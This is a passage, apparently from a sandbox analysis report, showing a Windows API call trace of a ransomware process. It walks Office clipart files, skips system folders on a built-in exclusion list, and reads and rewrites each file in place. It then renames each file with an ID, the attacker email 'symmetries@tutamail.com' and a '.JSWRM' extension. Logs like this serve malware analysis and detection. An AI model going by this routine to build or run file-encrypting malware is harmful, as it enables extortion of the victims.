0x23a300 [0076.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0076.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0076.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0076.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0076.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.397] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01173_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01173_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0076.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.398] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x760, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01176_.WMF", cAlternateFileName="")) returned 1 [0076.398] lstrcmpiW (lpString1="DD01176_.WMF", lpString2=".") returned 1 [0076.398] lstrcmpiW (lpString1="DD01176_.WMF", lpString2="..") returned 1 [0076.398] lstrcmpiW (lpString1="DD01176_.WMF", lpString2="...") returned 1 [0076.398] lstrcmpiW (lpString1="DD01176_.WMF", lpString2="windows") returned -1 [0076.398] lstrcmpiW (lpString1="DD01176_.WMF", lpString2="recovery") returned -1 [0076.398] lstrcmpiW (lpString1="DD01176_.WMF", lpString2="perflogs") returned -1 [0076.398] lstrcmpiW (lpString1="DD01176_.WMF", lpString2="documents and settings") returned -1 [0076.398] lstrcmpiW (lpString1="DD01176_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.398] lstrcmpiW (lpString1="DD01176_.WMF", lpString2="system volume information") returned -1 [0076.398] lstrcmpiW (lpString1="DD01176_.WMF", lpString2="msocache") returned -1 [0076.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0076.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01176_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01176_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01176_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0076.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0076.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01176_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01176_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01176_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0076.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01176_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.399] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1888) returned 1 [0076.399] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x760) returned 0x23fc98 [0076.399] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x760, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x760, lpOverlapped=0x0) returned 1 [0076.401] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.401] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x760, lpOverlapped=0x0) returned 1 [0076.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.402] CloseHandle (hObject=0x314) returned 1 [0076.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0076.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0076.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0076.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0076.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0076.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.402] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01176_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01176_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0076.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.403] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xed4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01178_.WMF", cAlternateFileName="")) returned 1 [0076.403] lstrcmpiW (lpString1="DD01178_.WMF", lpString2=".") returned 1 [0076.403] lstrcmpiW (lpString1="DD01178_.WMF", lpString2="..") returned 1 [0076.403] lstrcmpiW (lpString1="DD01178_.WMF", lpString2="...") returned 1 [0076.403] lstrcmpiW (lpString1="DD01178_.WMF", lpString2="windows") returned -1 [0076.403] lstrcmpiW (lpString1="DD01178_.WMF", lpString2="recovery") returned -1 [0076.403] lstrcmpiW (lpString1="DD01178_.WMF", lpString2="perflogs") returned -1 [0076.403] lstrcmpiW (lpString1="DD01178_.WMF", lpString2="documents and settings") returned -1 [0076.403] lstrcmpiW (lpString1="DD01178_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.403] lstrcmpiW (lpString1="DD01178_.WMF", lpString2="system volume information") returned -1 [0076.403] lstrcmpiW (lpString1="DD01178_.WMF", lpString2="msocache") returned -1 [0076.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0076.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01178_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01178_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01178_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0076.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0076.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01178_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01178_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01178_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0076.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.404] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3796) returned 1 [0076.404] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xed0) returned 0x24d210 [0076.404] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xed0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xed0, lpOverlapped=0x0) returned 1 [0076.419] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.419] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xed0, lpOverlapped=0x0) returned 1 [0076.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0076.419] CloseHandle (hObject=0x314) returned 1 [0076.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x212328 [0076.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0076.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0076.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0076.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0076.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0076.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.419] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01178_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01178_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0076.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x212328 | out: hHeap=0x1e0000) returned 1 [0076.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.420] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01179_.WMF", cAlternateFileName="")) returned 1 [0076.420] lstrcmpiW (lpString1="DD01179_.WMF", lpString2=".") returned 1 [0076.420] lstrcmpiW (lpString1="DD01179_.WMF", lpString2="..") returned 1 [0076.420] lstrcmpiW (lpString1="DD01179_.WMF", lpString2="...") returned 1 [0076.420] lstrcmpiW (lpString1="DD01179_.WMF", lpString2="windows") returned -1 [0076.420] lstrcmpiW (lpString1="DD01179_.WMF", lpString2="recovery") returned -1 [0076.420] lstrcmpiW (lpString1="DD01179_.WMF", lpString2="perflogs") returned -1 [0076.420] lstrcmpiW (lpString1="DD01179_.WMF", lpString2="documents and settings") returned -1 [0076.420] lstrcmpiW (lpString1="DD01179_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.420] lstrcmpiW (lpString1="DD01179_.WMF", lpString2="system volume information") returned -1 [0076.420] lstrcmpiW (lpString1="DD01179_.WMF", lpString2="msocache") returned -1 [0076.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0076.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01179_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01179_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01179_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0076.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01179_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01179_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01179_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x212328 [0076.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01179_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.421] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2024) returned 1 [0076.421] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7e0) returned 0x22fd48 [0076.421] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0x7e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0x7e0, lpOverlapped=0x0) returned 1 [0076.430] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.430] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0x7e0, lpOverlapped=0x0) returned 1 [0076.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0076.430] CloseHandle (hObject=0x314) returned 1 [0076.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x22a518 [0076.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0076.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0076.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0076.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0076.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0076.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.431] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01179_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01179_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0076.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22a518 | out: hHeap=0x1e0000) returned 1 [0076.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.431] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x824, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01180_.WMF", cAlternateFileName="")) returned 